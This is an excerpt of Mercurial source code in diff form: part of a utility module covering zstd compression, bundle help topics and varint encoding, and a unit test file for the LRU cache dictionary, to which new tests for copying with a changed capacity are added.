                     """A modern compression algorithm that is fast and highly flexible.
                     Only supported by Mercurial 4.1 and newer clients.
                     With the default settings, zstd compression is both faster and yields
                     better compression than ``gzip``. It also frequently yields better
                     compression than ``bzip2`` while operating at much higher speeds.
                     If this engine is available and backwards compatibility is not a
                     concern, it is likely the best available engine.
                     """
                     return 'zstd', 'ZS'
                 def wireprotosupport(self):
                     return compewireprotosupport('zstd', 50, 50)
                 def revlogheader(self):
                     return '\x28'
                 def compressstream(self, it, opts=None):
                     opts = opts or {}
                     # zstd level 3 is almost always significantly faster than zlib
                     # while providing no worse compression. It strikes a good balance
                     # between speed and compression.
                     level = opts.get('level', 3)
                     zstd = self._module
                     z = zstd.ZstdCompressor(level=level).compressobj()
                     for chunk in it:
                         data = z.compress(chunk)
                         if data:
                             yield data
                     yield z.flush()
                 def decompressorreader(self, fh):
                     return _ZstdCompressedStreamReader(fh, self._module)
                 class zstdrevlogcompressor(object):
                     def __init__(self, zstd, level=3):
                         # TODO consider omitting frame magic to save 4 bytes.
                         # This writes content sizes into the frame header. That is
                         # extra storage. But it allows a correct size memory allocation
                         # to hold the result.
                         self._cctx = zstd.ZstdCompressor(level=level)
                         self._dctx = zstd.ZstdDecompressor()
                         self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
                         self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
                     def compress(self, data):
                         insize = len(data)
                         # Caller handles empty input case.
                         assert insize > 0
                         if insize < 50:
                             return None
                         elif insize <= 1000000:
                             compressed = self._cctx.compress(data)
                             if len(compressed) < insize:
                                 return compressed
                             return None
                         else:
                             z = self._cctx.compressobj()
                             chunks = []
                             pos = 0
                             while pos < insize:
                                 pos2 = pos + self._compinsize
                                 chunk = z.compress(data[pos:pos2])
                                 if chunk:
                                     chunks.append(chunk)
                                 pos = pos2
                             chunks.append(z.flush())
                             if sum(map(len, chunks)) < insize:
                                 return ''.join(chunks)
                             return None
                     def decompress(self, data):
                         insize = len(data)
                         try:
                             # This was measured to be faster than other streaming
                             # decompressors.
                             dobj = self._dctx.decompressobj()
                             chunks = []
                             pos = 0
                             while pos < insize:
                                 pos2 = pos + self._decompinsize
                                 chunk = dobj.decompress(data[pos:pos2])
                                 if chunk:
                                     chunks.append(chunk)
                                 pos = pos2
                             # Frame should be exhausted, so no finish() API.
                             return ''.join(chunks)
                         except Exception as e:
                             raise error.RevlogError(_('revlog decompress error: %s') %
                                                     stringutil.forcebytestr(e))
                 def revlogcompressor(self, opts=None):
                     opts = opts or {}
                     return self.zstdrevlogcompressor(self._module,
                                                      level=opts.get('level', 3))
             compengines.register(_zstdengine())
             def bundlecompressiontopics():
                 """Obtains a list of available bundle compressions for use in help."""
                 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
                 items = {}
                 # We need to format the docstring. So use a dummy object/type to hold it
                 # rather than mutating the original.
                 class docobject(object):
                     pass
                 for name in compengines:
                     engine = compengines[name]
                     if not engine.available():
                         continue
                     bt = engine.bundletype()
                     if not bt or not bt[0]:
                         continue
                     doc = pycompat.sysstr('``%s``\n    %s') % (
                         bt[0], engine.bundletype.__doc__)
                     value = docobject()
                     value.__doc__ = doc
                     value._origdoc = engine.bundletype.__doc__
                     value._origfunc = engine.bundletype
                     items[bt[0]] = value
                 return items
             i18nfunctions = bundlecompressiontopics().values()
             # convenient shortcut
             dst = debugstacktrace
             def safename(f, tag, ctx, others=None):
                 """
                 Generate a name that it is safe to rename f to in the given context.
                 f:      filename to rename
                 tag:    a string tag that will be included in the new name
                 ctx:    a context, in which the new name must not exist
                 others: a set of other filenames that the new name must not be in
                 Returns a file name of the form oldname~tag[~number] which does not exist
                 in the provided context and is not in the set of other names.
                 """
                 if others is None:
                     others = set()
                 fn = '%s~%s' % (f, tag)
                 if fn not in ctx and fn not in others:
                     return fn
                 for n in itertools.count(1):
                     fn = '%s~%s~%s' % (f, tag, n)
                     if fn not in ctx and fn not in others:
                         return fn
             def readexactly(stream, n):
                 '''read n bytes from stream.read and abort if less was available'''
                 s = stream.read(n)
                 if len(s) < n:
                     raise error.Abort(_("stream ended unexpectedly"
                                        " (got %d bytes, expected %d)")
                                       % (len(s), n))
                 return s
             def uvarintencode(value):
                 """Encode an unsigned integer value to a varint.
                 A varint is a variable length integer of 1 or more bytes. Each byte
                 except the last has the most significant bit set. The lower 7 bits of
                 each byte store the 2's complement representation, least significant group
                 first.
                 >>> uvarintencode(0)
                 '\\x00'
                 >>> uvarintencode(1)
                 '\\x01'
                 >>> uvarintencode(127)
                 '\\x7f'
                 >>> uvarintencode(1337)
                 '\\xb9\\n'
                 >>> uvarintencode(65536)
                 '\\x80\\x80\\x04'
                 >>> uvarintencode(-1)
                 Traceback (most recent call last):
                     ...
                 ProgrammingError: negative value for uvarint: -1
                 """
                 if value < 0:
                     raise error.ProgrammingError('negative value for uvarint: %d'
                                                  % value)
                 bits = value & 0x7f
                 value >>= 7
                 bytes = []
                 while value:
                     bytes.append(pycompat.bytechr(0x80 | bits))
                     bits = value & 0x7f
                     value >>= 7
                 bytes.append(pycompat.bytechr(bits))
                 return ''.join(bytes)
             def uvarintdecodestream(fh):
                 """Decode an unsigned variable length integer from a stream.
                 The passed argument is anything that has a ``.read(N)`` method.
                 >>> try:
                 ...     from StringIO import StringIO as BytesIO
                 ... except ImportError:
                 ...     from io import BytesIO
                 >>> uvarintdecodestream(BytesIO(b'\\x00'))
                 >>> uvarintdecodestream(BytesIO(b'\\x01'))
                 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
                 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
                 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
                 >>> uvarintdecodestream(BytesIO(b'\\x80'))
                 Traceback (most recent call last):
                     ...
                 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
                 """
                 result = 0
                 shift = 0
                 while True:
                     byte = ord(readexactly(fh, 1))
                     result |= ((byte & 0x7f) << shift)
                     if not (byte & 0x80):
                         return result
                     shift += 7

             from __future__ import absolute_import, print_function
             import unittest
             import silenttestrunner
             from mercurial import (
                 util,
             )
             class testlrucachedict(unittest.TestCase):
                 def testsimple(self):
                     d = util.lrucachedict(4)
                     self.assertEqual(d.capacity, 4)
                     d['a'] = 'va'
                     d['b'] = 'vb'
                     d['c'] = 'vc'
                     d['d'] = 'vd'
                     self.assertEqual(d['a'], 'va')
                     self.assertEqual(d['b'], 'vb')
                     self.assertEqual(d['c'], 'vc')
                     self.assertEqual(d['d'], 'vd')
                     # 'a' should be dropped because it was least recently used.
                     d['e'] = 've'
                     self.assertNotIn('a', d)
                     self.assertIsNone(d.get('a'))
                     self.assertEqual(d['b'], 'vb')
                     self.assertEqual(d['c'], 'vc')
                     self.assertEqual(d['d'], 'vd')
                     self.assertEqual(d['e'], 've')
                     # Touch entries in some order (both get and set).
                     d['e']
                     d['c'] = 'vc2'
                     d['d']
                     d['b'] = 'vb2'
                     # 'e' should be dropped now
                     d['f'] = 'vf'
                     self.assertNotIn('e', d)
                     self.assertEqual(d['b'], 'vb2')
                     self.assertEqual(d['c'], 'vc2')
                     self.assertEqual(d['d'], 'vd')
                     self.assertEqual(d['f'], 'vf')
                     d.clear()
                     for key in ('a', 'b', 'c', 'd', 'e', 'f'):
                         self.assertNotIn(key, d)
                 def testunfull(self):
                     d = util.lrucachedict(4)
                     d['a'] = 1
                     d['b'] = 2
                     d['a']
                     d['b']
                     for key in ('a', 'b'):
                         self.assertIn(key, d)
                 def testcopypartial(self):
                     d = util.lrucachedict(4)
                     d['a'] = 'va'
                     d['b'] = 'vb'
                     dc = d.copy()
                     self.assertEqual(len(dc), 2)
                     for key in ('a', 'b'):
                         self.assertIn(key, dc)
                         self.assertEqual(dc[key], 'v%s' % key)
                     self.assertEqual(len(d), 2)
                     for key in ('a', 'b'):
                         self.assertIn(key, d)
                         self.assertEqual(d[key], 'v%s' % key)
                     d['c'] = 'vc'
                     del d['b']
                     dc = d.copy()
                     self.assertEqual(len(dc), 2)
                     for key in ('a', 'c'):
                         self.assertIn(key, dc)
                         self.assertEqual(dc[key], 'v%s' % key)
                 def testcopyempty(self):
                     d = util.lrucachedict(4)
                     dc = d.copy()
                     self.assertEqual(len(dc), 0)
                 def testcopyfull(self):
                     d = util.lrucachedict(4)
                     d['a'] = 'va'
                     d['b'] = 'vb'
                     d['c'] = 'vc'
                     d['d'] = 'vd'
                     dc = d.copy()
                     for key in ('a', 'b', 'c', 'd'):
                         self.assertIn(key, dc)
                         self.assertEqual(dc[key], 'v%s' % key)
                     # 'a' should be dropped because it was least recently used.
                     dc['e'] = 've'
                     self.assertNotIn('a', dc)
                     for key in ('b', 'c', 'd', 'e'):
                         self.assertIn(key, dc)
                         self.assertEqual(dc[key], 'v%s' % key)
                     # Contents and order of original dict should remain unchanged.
                     dc['b'] = 'vb_new'
                     self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
                     for key in ('a', 'b', 'c', 'd'):
                         self.assertEqual(d[key], 'v%s' % key)
+                def testcopydecreasecapacity(self):
+                    d = util.lrucachedict(5)
+                    d['a'] = 'va'
+                    d['b'] = 'vb'
+                    d['c'] = 'vc'
+                    d['d'] = 'vd'
+                    dc = d.copy(2)
+                    for key in ('a', 'b'):
+                        self.assertNotIn(key, dc)
+                    for key in ('c', 'd'):
+                        self.assertIn(key, dc)
+                        self.assertEqual(dc[key], 'v%s' % key)
+                    dc['e'] = 've'
+                    self.assertNotIn('c', dc)
+                    for key in ('d', 'e'):
+                        self.assertIn(key, dc)
+                        self.assertEqual(dc[key], 'v%s' % key)
+                    # Original should remain unchanged.
+                    for key in ('a', 'b', 'c', 'd'):
+                        self.assertIn(key, d)
+                        self.assertEqual(d[key], 'v%s' % key)
+                def testcopyincreasecapacity(self):
+                    d = util.lrucachedict(5)
+                    d['a'] = 'va'
+                    d['b'] = 'vb'
+                    d['c'] = 'vc'
+                    d['d'] = 'vd'
+                    dc = d.copy(6)
+                    for key in ('a', 'b', 'c', 'd'):
+                        self.assertIn(key, dc)
+                        self.assertEqual(dc[key], 'v%s' % key)
+                    dc['e'] = 've'
+                    dc['f'] = 'vf'
+                    for key in ('a', 'b', 'c', 'd', 'e', 'f'):
+                        self.assertIn(key, dc)
+                        self.assertEqual(dc[key], 'v%s' % key)
+                    dc['g'] = 'vg'
+                    self.assertNotIn('a', dc)
+                    for key in ('b', 'c', 'd', 'e', 'f', 'g'):
+                        self.assertIn(key, dc)
+                        self.assertEqual(dc[key], 'v%s' % key)
+                    # Original should remain unchanged.
+                    for key in ('a', 'b', 'c', 'd'):
+                        self.assertIn(key, d)
+                        self.assertEqual(d[key], 'v%s' % key)
             if __name__ == '__main__':
                 silenttestrunner.main(__name__)